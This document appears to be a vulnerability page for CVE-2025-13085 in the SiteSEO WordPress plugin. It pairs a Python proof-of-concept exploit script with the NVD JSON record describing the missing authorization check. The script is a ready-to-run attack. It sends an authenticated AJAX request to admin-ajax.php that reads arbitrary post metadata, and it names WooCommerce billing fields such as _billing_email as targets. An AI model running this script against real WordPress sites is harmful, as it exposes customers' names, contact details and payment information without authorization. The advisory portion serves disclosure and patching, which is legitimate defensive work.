CVE-2025-13085

import requests import sys # CVE-2025-13085 PoC - SiteSEO Unauthorized Metadata Disclosure # Target: WordPress site with SiteSEO plugin <= 1.3.2 def exploit_siteseo_cve_2025_13085(target_url, wp_admin_cookie): """ Exploit for SiteSEO improper authorization vulnerability Allows authenticated users with siteseo_manage capability to read arbitrary post metadata """ # Target endpoint for AJAX request ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Prepare payload to read arbitrary post metadata # This exploits the resolve_variables() function lacking authorization checks payload = { 'action': 'siteseo_pro_resolution', 'post_id': 'TARGET_POST_ID', # Target post/order ID to read metadata from 'variable': 'meta_key_to_exploit', # e.g., _billing_email, _billing_phone, etc. 'post_type': 'post' # or 'shop_order' for WooCommerce } headers = { 'Cookie': wp_admin_cookie, 'Content-Type': 'application/x-www-form-urlencoded' } try: response = requests.post(ajax_url, data=payload, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Request successful - Metadata disclosure possible") print(f"[+] Response: {response.text}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-13085.py <target_url> <wp_admin_cookie>") print("Example: python cve-2025-13085.py http://example.com 'wordpress_logged_in_xxx=xxx'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_siteseo_cve_2025_13085(target, cookie)

{"cve": {"id": "CVE-2025-13085", "sourceIdentifier": "[email protected]", "published": "2025-11-19T07:15:50.057", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SiteSEO – SEO Simplified plugin for WordPress is vulnerable to Improper Authorization leading to Sensitive Post Meta Disclosure in versions up to and including 1.3.2. This is due to missing object-level authorization checks in the resolve_variables() AJAX handler. This makes it possible for authenticated attackers with the siteseo_manage capability (e.g., Author-level users who have been granted SiteSEO access by an administrator) to read arbitrary post metadata from any post, page, attachment, or WooCommerce order they cannot edit, via the custom field variable resolution feature granted they have been given access to SiteSEO by an administrator and legacy storage is enabled. In affected WooCommerce installations, this exposes sensitive customer billing information including names, email addresses, phone numbers, physical addresses, and payment methods."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/admin.php#L106", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/ajax.php#L542", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/siteseo/trunk/main/titlesmetas.php#L494", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3397272/siteseo/trunk?contextall=1&old=3387094&old_path=%2Fsiteseo%2Ftrunk", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4d740ba8-4877-4b27-a1cb-26095f851ea6?source=cve", "source": "[email protected]"}]}}